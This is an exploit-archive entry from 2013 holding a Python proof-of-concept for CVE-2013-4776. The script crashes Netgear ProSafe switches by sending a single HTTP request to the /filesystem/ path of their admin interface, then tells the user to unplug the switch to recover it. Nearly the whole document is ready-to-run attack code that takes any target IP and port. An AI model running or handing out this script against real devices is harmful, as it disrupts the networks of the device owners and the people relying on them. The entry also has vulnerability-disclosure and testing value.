Netgear ProSafe - Denial of Service Vulnerability

2013-08-22T00:00:00
ID 1337DAY-ID-21150
Type zdt
Reporter Juan J. Guelfo
Modified 2013-08-22T00:00:00

Description

Netgear ProSafe switches suffer from denial of service and unauthenticated startup-config disclosure vulnerabilities.

                                        
                                            import sys, getopt, urllib2
from subprocess import *
 
 
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS ([email protected])"
 
 
# Prints title and other header info
def header():
    print ""
    print " ================================================================= "
    print "|  Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""
 
     
# Prints help    
def help():
    header()
    print """
   Usage: python CVE-2013-4776.py [mandatory options]
 
   Mandatory options:
       -t target               ...Target IP address
       -p port                 ...Port where the HTTP admin interface is listening on
         
   Example:
       python CVE-2013-4776.py -t 192.168.0.1 -p 80
    """
    sys.exit(0) 
 
     
if __name__ == '__main__':
     
    #Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])
 
    except getopt.GetoptError, err:
        header()
        print "\n[-] Error: {0}.\n".format(str(err))
        sys.exit(1)
     
    if not options:
        help()
     
    target = None
    port = None
    for opt, arg in options:
        if opt in ("-t"):
            target = arg
         
        if opt in ("-p"):
            port = arg    
             
    #Option input validation
    if not target or not port:
        help()
        print "[-] Error: Incorrect syntax.\n"
        sys.exit(1)
     
    header()
    headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }
 
    try:
        # Get the startup config via HTTP admin interface
        print "[+] Triggering DoS condition..."
        r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
        urllib2.urlopen(r,"",5).read()
     
    except urllib2.URLError:
        print "[-] Error: The connection could not be established.\n"
         
    except:
        print "[+] The switch should be freaking out..."
        print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"
 
    sys.exit(0)

#  0day.today [2018-02-17]  #